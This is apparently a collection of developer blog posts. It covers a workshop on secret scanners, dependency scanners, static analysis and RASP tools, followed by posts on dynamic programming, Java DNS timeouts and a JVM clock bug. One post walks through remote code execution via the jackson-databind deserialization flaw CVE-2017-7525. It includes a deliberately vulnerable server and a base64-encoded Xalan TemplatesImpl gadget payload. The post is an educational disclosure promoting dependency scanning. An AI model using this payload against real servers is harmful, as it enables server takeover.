IMWorld Bucharest

I’ve just had the great pleasure to present again in Bucharest at this year IMWorld an introduction of security tools. We had some WiFi issues, so I had to change slightly the workshop contents, but the audience was very sympathetic and overall we were all pleased with the results!

As the slides are covering only the introduction to the topic, I will now detail here the workshop contents so that you can reply what we did live!

SAST/SIS TOOLS

SIS tools (Sensitive Information Scanners) are used to examine your codebase for the presence of information that should not be disclosed, like AWS or PGP keys.

 

git-leaks

Let’s start having a look at git-leaks. You can download the binary from here, unpack it and check it works with the command:

gitleaks-linux-amd64 –help

As you can see there’re a lot of options, with the ability to run it against an entire organization for example, but you can now run the command against a sample repository:

gitleaks-linux-amd64 –repo=https://github.com/gitleakstest/gronit

As you can see it is reporting problems: launch it again with –verbose, few problems pop up (what about those AWS keys???), you can also add  –report=report.csv –csv to generate a csv report.

Now, why don’t you look at one of your OWN repositories? You could be surprised! Or try this one:

gitleaks-linux-amd64 –repo=https://github.com/dxa4481/truffleHog.git –verbose

 

trufflehog

trufflehog is a python tool, so extremely easy to install if you are on Linux! Just type:

sudo pip install trufflehog

You can check it works with:

trufflehog –help

There’s a lot you can do here: you can have tghe output in HSON, you can define extra rules, and so on. It deserves a bit of experimenting! But for the time being, please rtun on the first repository:

trufflehog –regex https://github.com/gitleakstest/gronit

Again, we can see the AWS keys popping up (ops!). Now, try one of your repos, or maybe this one:

trufflehog –regex –entropy=False https://github.com/dxa4481/truffleHog.git

 

Others

Due to the slightly more complicated installation, we won’t have a look at these ones, but I suggest you check them out as well:

  • gitrob: very comprehensive analysis
  • git-secrets: a git hook provided directly by AWS

 

SAST/SDA TOOLS

SDA tools (Sensitive Dependency Analysis), also known as SCAN (Software Composition ANalysis) are used to examine the software component you use in order to check if any of them is affected by known vulnerabilities. Here I will gently shamelessly plug the tool my startup is building, Meterian, and I hope you do not mind 🙂

 

meterian

Download the latest client from the website and run it against a sample project (you can use this one we used in the previous blog post):

cd /your/project/folder
java -jar /path/to/meterian-cli.jar

You will probably be asked to authenticate, just use your GitHub or google account to do so. You will see some scores (the security one will be, well, very low!) and a report will be generated: just click on the link to access it (again, same social login). If you used my example, jackson-databind 2.8.8 is definitely a winner! It’s potentially exposing your project to at least four different exploits… nice!

You can also see a list of possible upgrades for your libraries and (if the feature is

enabled for your account) also the full list of components and the related versions.

 

dependency-check

Download the client from the website, following the link from Github, in a folder, and run it against the same project used before:

cd /your/project/folder
dependency-check/bin/dependency-check.sh –project sample –scan .

The long NVD database download may happen, it will take a while! Well, just have a coffee or something, then come back in 10 minutes and then find an HTML report in the folder:

dependency-check-report.html

Just open the report with a browser, you will see a list of the offending libraries.

SAST/SCA TOOLS

SCA tools (Software Code Analysis), are used to examine the code you write, either in binary or source format.

 

spotbugs

Download and unpack the tool, then set the SPOTBUGS_HOME variable:

export SPOTBUGS_HOME=/path/to/spotbugs-3.1.3

Spotbus has a UI (of course it works also from the command line): launch the UI and do a quick demo:

java -jar $SPOTBUGS_HOME/lib/spotbugs.jar

Get some code on your laptop (I suggest the fastjson project, it has a wide attack surface): create a new project, select the binary output of the project (you may need to run mvn package on the project to get it) and select also the source code. Click the button and then dig into the problems: you have a lot to get through!

Spotbugs has a nice plugin, findecbugs, that specifically finds security problems: once you downloaded the plugin, copy the jar file in the plugin folder of spotbugs:

cp findsecbugs-plugin-1.8.0.jar $SPOTBUGS_HOME/plugin/

Open spotbugs again, re-run the analysis and enjoy a tour of the newly “security” section!

PMD

Download and unpack the tool, run the tool against the sample project from the newly created folder:

bin/run.sh pmd -f text -d /path/to/project -R rulesets/java/quickstart.xml

There’re a number of rules here, enjoy some time in investigating them!

Errorprone

This can only be used as a plugin tool but it’s pretty effective!  Clone the repository:

git clone git@github.com:google/error-prone.git

Or just download the zip:

wget https://github.com/google/error-prone/archive/master.zip && unzip master.zip

Move to /examples, change the pom.xml so that it references 3.2.1 of errorprone and:

mvn clean package

Notice that the system stops with an error (the exception not thrown) plus the suggestion: fix the errors one by one, see the compilation passing :).

RASP TOOLS

This is the last category of tools we see today, and it’s quite an interesting one. RASP tools basically will melt with your code, deploying an agent within it (typically using code instrumentation) and they will actively track any malicious activity: when that happens, the tool will take some preventive measures (i.e. stop the user session) and report the issue back to your company risk assessment system.

OpenRASP

This is an open source tool by Baidu, that shows an interesting take on the probkem.

Download and install a fresh Tomcat from here, unpack and start Tomcat the usual way:

cd apache-tomcat-8.5.6/
bin/catalina.sh run

Access http://127.0.0.1:8080 and see Tomcat working!

Clone the test cases from here, move into the subfolder java/vulns and create the war package:

mvn package

Copy the newly created package under the /webapps subfolder of Tomcat: the server will promptly hot-deploy the application.

cp openrasp-testcases/java/vulns/target/vulns.war apache-tomcat-8.5.6/webapps/

Visit http://127.0.0.1:8080/vulns to see the application page (you may need google translate at this point to get a bit of English!) and try the exploit 002 and 004.2: see how is easy to bypass security and executing commands on the server.

Now, download the 0.31 Java openRASP from here, unpack and install it on Tomcat:

java -jar RaspInstall.jar -install  /path/to/apache-tomcat-8.5.6

Now, restart tomcat, you will see the OpenRASP logo in the console. Start tailing the openRASP log:

tail -f /path/to/apache-tomcat-8.5.6/rasp/logs/alarm/alarm.log

Try again to execute the vulnerabilities and… surprise!

  1. you are blocked with a fancy page 🙂
  2. the logs show the intrusion with complete detail

Hope you enjoy it!

 

Advertisements

Are you using an opensource library? There’s a good chance you are vulnerable…

This is the talk I presented yesterday at Codemotion Rome 2018! Awesome conference and people, cannot wait for the next one!

You can find a detailed technical explanation in my previous blog post, and you can also have access to the code on GitHub to reproduce the exploit yourself.

Do not underestimate your problem, and put the correct procedure in place: you do not want to be the next Equifax.

 

Remotely execute Java code using JSON

Abstract.

How difficult is to exploit a vulnerability in a common Java library in order to remotely execute Java code on a remote server and successfully taking control over it? Not much, really. In this article, we will demonstrate how to do that using CVE- 2017-7525, a well-known vulnerability in jackson-databind, a widely used library to serialize and deserialize JSON, also part of the spring-boot stack.

The sample code.

As we all know, the task of serializing and deserializing JSON messages is a very common task, especially in modern microservices REST-based applications: almost every time an API is called, a JSON message is sent to the server, to be transformed in a Java object. Because of a stream of deserialization vulnerabilities in jackson-databind it’s now possible to write simple exploits in order to get access to unpatched servers when polymorphic type handling is enabled.

In order to clearly explain the concepts, we are introducing here a simple server that handles products with two REST APIs, one to get the list of the products and one to add a new product  (all the code is available on GitHub). Please note that this is just a sample: we just want to provide you with a simple and understandable piece of code, and by no means it can be classified (we hope!) as production code.

A sample of our Product class, it holds some  basic product information:

public class Product {

    private int id;
    private String name;
    private String description;
    private Object data; 

    protected Product() {
    }

    [...]

Our ProductDatabase class, just a glorified HashMap

public class ProductsDatabase {

  private Map<String, Product> products = new HashMap<>();
  private AtomicInteger idGenerator = new AtomicInteger(0);

  public ProductsDatabase() {
     add(new Product(0,"apple", "Real apple from Italy", randomData()));
     add(new Product(0,"orange", "Real orange from Italy", randomData()));
     add(new Product(0,"kiwi", "Real kiwi from Italy", randomData()));
  }

  public Collection list() {
    return Collections.unmodifiableCollection(products.values());
  }

  public Product add(Product newProduct) {
    Integer newId = idGenerator.incrementAndGet();
    Product product = newProduct.duplicate(newId);
    products.put(newId.toString(), product);
    return product;
  }

  [...]
}

Our simple server, written with SparkJava:

public class Main {
 
  private static ProductsDatabase products = new ProductsDatabase();
  private static ObjectMapper deserializer = new ObjectMapper().enableDefaultTyping();
  private static ObjectMapper serializer = new ObjectMapper();
 
  public static void main(String[] args) {

    port(8888);

    // GET list all products
    get("/products", (request, response) -> {
      Collection res = products.list();
      return serializer.writeValueAsString(res);
    });

    // POST add new product
    post("/products", (request, response) -> {
      Product received = deserializer.readValue(request.body(), Product.class);
      products.add(received);
      response.status(201);
    });
  }
  [...]
}

You can add a product to the database with a simple curl call with a JSON body containing the new product data:

curl -i -X POST -d '{"name":"melon","description":"Real melon from Italy", "data":["java.util.HashMap",{"cost":2,"color":"yellow"}]}' http://localhost:8888/products

The exploit.

In order to exploit the vulnerability, we need to have a vector. On this occasion we decided to use Apache Xalan, a common XSLT library also included in the JDK (which, until version 8u45, is possible to use as the vector, in the same way Xalan is used here). Please note that there are a lot of other options available as attack vectors, but for the sake of simplicity, we will focus here on a very specific one.

We will use a particular class from Xalan which is capable to deserialize an encoded class file from an XML, and dynamically create an instance of such class: we will craft a JSON message that will contain the encoded class of our exploit class here:

public class Exploit extends org.apache.xalan.xsltc.runtime.AbstractTranslet {

  public Exploit() throws Exception {
    System.err.println("Your server has been compromised!");
  }

  @Override
  public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
  }

  @Override
  public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
  }
}

We just need to compile this source code in a .class file, encoded it in Base64 and prepare our evil JSON message:

{
  "name": "fakeapple",
  "description": "Fake fruit from UK",
  "data": ["org.apache.xalan.xsltc.trax.TemplatesImpl",
  {
    "transletBytecodes" : [ "yv66vgAAADQALgcAAgEAB0V4cGxvaXQHAAQBAC9vcmcvYXBhY2hlL3hhbGFuL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEABjxpbml0PgEAAygpVgEACkV4Y2VwdGlvbnMHAAkBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAEQ29kZQoAAwAMDAAFAAYJAA4AEAcADwEAEGphdmEvbGFuZy9TeXN0ZW0MABEAEgEAA2VycgEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwgAFAEAIVlvdXIgc2VydmVyIGhhcyBiZWVuIGNvbXByb21pc2VkIQoAFgAYBwAXAQATamF2YS9pby9QcmludFN0cmVhbQwAGQAaAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAlMRXhwbG9pdDsBAAl0cmFuc2Zvcm0BAFAoTG9yZy9hcGFjaGUveGFsYW4veHNsdGMvRE9NO1tMb3JnL2FwYWNoZS94bWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgcAIgEAKG9yZy9hcGFjaGUveGFsYW4veHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAAhkb2N1bWVudAEAHExvcmcvYXBhY2hlL3hhbGFuL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAMVtMb3JnL2FwYWNoZS94bWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAHMoTG9yZy9hcGFjaGUveGFsYW4veHNsdGMvRE9NO0xvcmcvYXBhY2hlL3htbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xvcmcvYXBhY2hlL3htbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBACRMb3JnL2FwYWNoZS94bWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQAwTG9yZy9hcGFjaGUveG1sL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEV4cGxvaXQuamF2YQAhAAEAAwAAAAAAAwABAAUABgACAAcAAAAEAAEACAAKAAAAOwACAAEAAAANKrcAC7IADRITtgAVsQAAAAIAGwAAAAoAAgAAAAgABAAJABwAAAAMAAEAAAANAB0AHgAAAAEAHwAgAAIABwAAAAQAAQAhAAoAAAA/AAAAAwAAAAGxAAAAAgAbAAAABgABAAAADQAcAAAAIAADAAAAAQAdAB4AAAAAAAEAIwAkAAEAAAABACUAJgACAAEAHwAnAAIABwAAAAQAAQAhAAoAAABJAAAABAAAAAGxAAAAAgAbAAAABgABAAAAEgAcAAAAKgAEAAAAAQAdAB4AAAAAAAEAIwAkAAEAAAABACgAKQACAAAAAQAqACsAAwABACwAAAACAC0=" ],
    "transletName": "oops!",
    "outputProperties": {}
   }
 }

After sending the message to the server as a normal “add product” request, the encoded class will be instantiated by the Xalan TemplatesImpl class in order for it to populate the value of the outputProperties field: as the constructor code is executed, the evil code is executed as well and the server compromised. Yes, you might have exceptions in the server, but it’s too late.

Conclusions.

This is just an example of hundreds of exploits currently possible using public vulnerabilities on various open source libraries and for that reason, it’s extremely important that you add to your build pipeline a scanner capable to detect and block the build if such situation is detected. We would kindly invite you to use our simple command line client available at meterian.io and avoid future nasty surprises. You do not want to be the next Equifax.

You can reach me at meterian.io!

`Disclaimer: please note that all these information are publicly available on the internet. This is just a summary post from a cybersecurity practitioner and nothing else. The code provided is for research purposes only.
Creative Commons Licence
This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.

Dynamic Programming explained (hopefully)

Okay, so some of you certainly already heard about Dynamic Programming (DP), but this is what I understood so far and I am happy to share with you.

Theory

In short, DP is all about ordering your computations in a way that avoids recalculating duplicate work: you have a main problem and a lot of subproblems.

There are two key attributes that a problem must have in order for DP to be applicable: optimal structure and overlapping subproblems:

  • when you have an optimal structure, then the optimal solution of a given problem can be obtained by the combination of optimal solutions of its subproblems
  • when you have overlapping subproblems then a solution of a problem should require the same subproblem again and again

Hey, please note that if a problem can be solved by combining optimal solution of non overlapping subproblems then we are in the “divide and conquer” area, where for example merge sort and quick sort lies.

Dynamic Programming is typically implemented using two common techniques, tabulation and memoization:

  • when you solve a DP problem using tabulation you solve the problem using a bottom-up approach, by solving all subproblems first, and creating a n-dimensional table: based on such table the solution to the original problem is computed. Because of that, tabulation solves all the subproblems.
  • when you solve a DP problem using memoization you do it by maintaining a map of already solved subproblem: you solve the problem top-down, basically solving the top problem first and then recursing in solving the subproblems. Memoization may pay an overhead due to the recursion, but it does not need to solve all the subproblems

Please note that in DP you will often use backtracking, that incrementally builds candidates for the solution and then abandons them when it determines that they cannot contribute to the solution.

Some code, please!

Ok, all good. Now where do we go from here? Some code will help 🙂 A typical DP problem is the fibonacci sequence:

fib(n) = fib(n-1) + fib(n-2)

I guess you can already see the overlapping subproblems and the optimal structure: let’s try to solve this with the most natural solution (I guess), which is a recursion.

    private static int fib(int val) {
        if (val == 0 || val == 1)
            return 1;
        else
            return fib(val - 1) + fib(val - 2);
    }

Ok, cool. It works: result! Pretty inefficient tough,  as it uses a large amount of stack memory and computes the solution to the same problem again and again! In fact, for example, to compute fib(5) it will compute three times fib(2). How can we improve this? Well, memoization comes in handy:

    private static Map<Integer, Integer> cache = new HashMap<Integer, Integer>();

    private static int fib(int val) {
        if (val == 0 || val == 1)
            return 1;
        else {
            Integer res = cache.get(val);
            if (res == null) {
                res = fib(val - 1) + fib(val - 2);
                cache.put(val, res);
            }
            
            return res;
        }        
    }

Ok, this is better. At least we do not recompute a lot of times the same solution, but we still use a lot of stack memory, to handle the recursion. And, at the end of the day, we need to compute all the solution to solve this problem, don’t we? Why don’t we use tabulation then? if we do so, we can revert to a nice iterative solution!

    private static int fib(int val) {
        if (val == 0 || val == 1)
            return 1;
        
        int fibs[] = new int[val+1];
        fibs[0] = 1;
        fibs[1] = 1;
        
        for (int i=2; i<=val; i++)
            fibs[i] = fibs[i-1] + fibs[i-2];
        
        return fibs[val];
    }

Ah, that’s better! No more recursion, a plain iterative process going on, just a bit of memory used for our table. But wait… can we do any better? Do we really need the whole table? Can we do better than Dynamic Programming?

    private static int fib(int val) {
        int prev = 0;
        int curr = 1;
        
        for (int i=2; i<=val; i++) {
            int next = curr + prev;
            prev = curr;
            curr = next;
        }
        
        return curr;
    }

Oh yeah 🙂 We just need to keep the last two values, n-1 and n-2: job done!

Conclusions (?)

DP was useful to think out the best algorithm, it was instrumental to discover it but, then, well, we needed that plain old spark of genius that not all of us have (certainly not me!) and some help has been very welcome. But without DP (and without a bigger spark) we would never easily found out an O(n) elegant and efficient solution: so it helps knowing about it. And sometimes some problems are really not solvable without DP, so please do not underestimate it!

Let me know if you are interested in this stuff, I can post more 🙂

 

 

Java: no timeout on DNS resolution

Breaking news! I just discovered (well. actually yesterday) that it’s not possible to set a timeout on DNS resolution in Java, which relies on the underlying OS. This is NOT good when you have any shape or form of SLA or QOS, you basically potentially throwing it out of the window!

I suggest you do something about it, this is the code I pushed on msnos (see here code and test), basically it uses a Threadpool and a Future to make the magic happen:

[...]
import org.apache.http.conn.DnsResolver;
[...]
public class DnsResolverWithTimeout implements DnsResolver {

    [...]
    @Override
    public InetAddress[] resolve(final String host) throws UnknownHostException {

        Future<InetAddress[]> result = executor.submit(new Callable<InetAddress[]>() {
            @Override
            public InetAddress[] call() throws Exception {
                return systemResolver.resolve(host);
            }
        });

        try {
            return result.get(timeoutInMillis, TimeUnit.MILLISECONDS);
        } catch (InterruptedException e) {
            log.warn("Unexpected interrupton while resolving host "+host, e);
            Thread.currentThread().interrupt();
        } catch (ExecutionException e) {
            log.warn("Unexpected execution exception", e.getCause());
        } catch (TimeoutException e) {
            log.warn("Timeout of {} millis elapsed resolving host {}", timeoutInMillis, host);
        }

        throw new UnknownHostException(host + ": DNS timeout");
    }
}

Of course you can make sure your OS is behaving, but you may not have such luxury 🙂

JVM issue: concurrency is affected by changing the date of the system! [part 4]

I am frequently challenged about the seriousness of this bug and the impact that it has. It’s not the first time I try to explain that, because this bug affects LockSupport.parkNanos() it basically spreads like a virus across all the platform, but let’s see this more practically

$ grep -r -l "parkNanos" .
./java/util/concurrent/Future.java
./java/util/concurrent/FutureTask.java
./java/util/concurrent/ThreadPoolExecutor.java
./java/util/concurrent/ScheduledThreadPoolExecutor.java
./java/util/concurrent/RunnableFuture.java
./java/util/concurrent/package-info.java
./java/util/concurrent/ExecutorCompletionService.java
./java/util/concurrent/CancellationException.java
./java/util/concurrent/RunnableScheduledFuture.java
./java/util/concurrent/CompletableFuture.java
./java/util/concurrent/AbstractExecutorService.java
./javax/swing/text/JTextComponent.java
./javax/swing/SwingWorker.java
./sun/swing/text/TextComponentPrintable.java
./sun/swing/SwingUtilities2.java

Well, it does not look that bad, does it? But uhm… I guess we are missing something… who’s using this classes? And who’s using such classes? And who’s using such classes? Omg… I am getting an headhache! Almost EVERYTHING is using this! So trust me, you will be affected. Maybe you are still not believing it, but please remember that this affects also Object:wait(:long) and so, transitively, also synchronized. Wait… WOOT? Oh yeah 🙂 So lots of fun! Especially when your system, deployed on client premises, starts doing “strange” things and you are called by your (not very happy) support team.

Be aware that this bug is now fixed in JDK8 and I have no knowledge of any successful backports of it into JDK7.

See also
The full saga, all the articles I published on the matter:

JVM issue: concurrency is affected by changing the date of the system! [part 3]

I have been asked further information about the matter and for that reason I am pushing a bit of more code here. It’s C++, so be aware of it! For the records, we are looking at the sources of the hotspot JVM, you can find the source here:
http://hg.openjdk.java.net/jdk8/jdk8/hotspot/file/aed585cafc0d/src/os/linux/vm/os_linux.cpp

Let’s have a look at the park() function of PlatformEvent, which is used within all synchronization primitives of the JVM:

int os::PlatformEvent::park(jlong millis) {
   [...]
 
   struct timespec abst;
   compute_abstime(&abst, millis);
   [...]

   while (_Event < 0) {
     status = os::Linux::safe_cond_timedwait(_cond, _mutex, &abst);
     if (status != 0 && WorkAroundNPTLTimedWaitHang) {
       pthread_cond_destroy (_cond);
       pthread_cond_init (_cond, NULL) ;
     }
     assert_status(status == 0 || status == EINTR ||
                   status == ETIME || status == ETIMEDOUT,
                   status, "cond_timedwait");
     if (!FilterSpuriousWakeups) break ;                 // previous semantics
     if (status == ETIME || status == ETIMEDOUT) break ;
     // We consume and ignore EINTR and spurious wakeups.
   }

Please look at the line in bold, where the end time to wait is computed: if you open that function (line 5480) you will notice that it’s calculating an absolute time. based on the wall clock

   [...]
   static struct timespec* compute_abstime(timespec* abstime, jlong millis) {

      if (millis < 0)  millis = 0;

      struct timeval now;
      int status = gettimeofday(&now, NULL);
      [...]

So what will happen is that the park function will be waiting on an absolute time based on a wall clock, hence will fail miserably if the wall clock is changed.

The simplest fix, without changing too much code, would be to use the CLOCK_MONOTONIC (or CLOCK_MONOTONIC_RAW, even better) to compute the absolute time ( clock_gettime(CLOCK_MONOTONIC, &ts) ) and also to check it the same way in the main loop (you can associate any available clock with a pthread_cond_timewait)

Then, if we really want to stay on the safe side, we should avoid using absolute delays and use relative delays, as POSIX specs explicitly guarantees that threads waiting on a relative time are not affected to changes to the underling clock, while when using absolute delays the situation is historically “fuzzy”.

Is that complex? I does not look so, at least looking at the code (I will try to patch it myself for sure) but I surely do not grasp the complexity of the whole hotspot, so I may fail miserably. It also have to be noted that my C++ skills are kind of dated 🙂

See also
The full saga, all the articles I published on the matter: